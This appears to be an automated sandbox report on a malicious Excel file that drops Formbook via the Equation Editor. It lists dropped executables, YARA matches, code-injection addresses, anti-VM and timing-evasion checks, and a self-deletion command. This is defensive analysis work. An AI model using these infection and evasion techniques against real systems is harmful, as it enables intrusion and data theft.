Source: C:\Users\Public\vbc.exe	Code function: 5_2_009B0D3B		5_2_009B0D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098CD5B		5_2_0098CD5B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02111238		7_2_02111238
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206E2E9		7_2_0206E2E9
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02072305		7_2_02072305
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02077353		7_2_02077353
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020BA37B		7_2_020BA37B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206F3CF		7_2_0206F3CF
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020963DB		7_2_020963DB
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0209D005		7_2_0209D005
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02073040		7_2_02073040
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0208905A		7_2_0208905A
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206E0C6		7_2_0206E0C6
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02112622		7_2_02112622
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02074680		7_2_02074680
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0207E6C1		7_2_0207E6C1
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020F579A		7_2_020F579A
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0207C7BC		7_2_0207C7BC
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020A57C3		7_2_020A57C3
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020AD47D		7_2_020AD47D
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02081489		7_2_02081489
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020A5485		7_2_020A5485
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0207351F		7_2_0207351F
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020B6540		7_2_020B6540
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0208C5F0		7_2_0208C5F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02123A83		7_2_02123A83
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02097B00		7_2_02097B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0211CBA4		7_2_0211CBA4
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206FBD7		7_2_0206FBD7
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020FDBDA		7_2_020FDBDA
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0207C85C		7_2_0207C85C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0209286D		7_2_0209286D
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0210F8EE		7_2_0210F8EE
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020F5955		7_2_020F5955
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0211098E		7_2_0211098E
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020729B2		7_2_020729B2
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020869FE		7_2_020869FE
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020A2E2F		7_2_020A2E2F
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0208EE4C		7_2_0208EE4C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_02080F3F		7_2_02080F3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0209DF7C		7_2_0209DF7C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_020A0D3B		7_2_020A0D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0207CD5B		7_2_0207CD5B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0210FDDD		7_2_0210FDDD
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009C548		7_2_0009C548
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009C7AF		7_2_0009C7AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009C87B		7_2_0009C87B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00088C6B		7_2_00088C6B
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00088C70		7_2_00088C70
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009CC9C		7_2_0009CC9C
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00082D87		7_2_00082D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00082D90		7_2_00082D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00082FB0		7_2_00082FB0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: L2.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0206DF5C appears 115 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 020DF970 appears 81 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 020B3F92 appears 108 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 020B373B appears 238 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0206E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0097DF5C appears 105 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0097E2A8 appears 37 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009EF970 appears 78 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009C3F92 appears 111 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009C373B appears 210 times

Yara signature match

Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/21@8/4

Contains functionality to check free disk space

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_00404356

Contains functionality to instantiate COM classes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,

4_2_00402020

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$L2.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD558.tmp

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: L2.xlsx	Virustotal: Detection: 30%
Source: L2.xlsx	ReversingLabs: Detection: 26%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: L2.xlsx

Static file information: File size 1308600 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, control.exe

Document has a 'vbamacros' value indicative of goodware

Source: L2.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: L2.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405E88

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_73002F60 push eax; ret		4_2_73002F8E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C9AD push eax; ret		5_2_0041C9BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040D291 push ebp; iretd		5_2_0040D296
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3C5 push eax; ret		5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040C394 pushad ; ret		5_2_0040C3E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B47C push eax; ret		5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B412 push eax; ret		5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B41B push eax; ret		5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00414E45 push ebp; iretd		5_2_00414E48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004106D4 push cs; iretd		5_2_004106D7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00414F4F push ss; ret		5_2_00414F5F
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0206DFA1 push ecx; ret		7_2_0206DFB4
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0008D291 push ebp; iretd		7_2_0008D296
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0008C394 pushad ; ret		7_2_0008C3E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009B3C5 push eax; ret		7_2_0009B418
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009B41B push eax; ret		7_2_0009B482
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009B412 push eax; ret		7_2_0009B418
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009B47C push eax; ret		7_2_0009B482
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009C4F5 push cs; iretd		7_2_0009C4F7
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_000906D4 push cs; iretd		7_2_000906D7
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_0009C9AD push eax; ret		7_2_0009C9BC
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00094E45 push ebp; iretd		7_2_00094E48
Source: C:\Windows\SysWOW64\control.exe	Code function: 7_2_00094F4F push ss; ret		7_2_00094F5F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: L2.xlsx

Stream path 'EncryptedPackage' entropy: 7.99983620552 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 964	Thread sleep time: -36000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 172	Thread sleep time: -120000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,		4_2_00405E61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_0040548B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,		4_2_0040263E

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2158486728.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
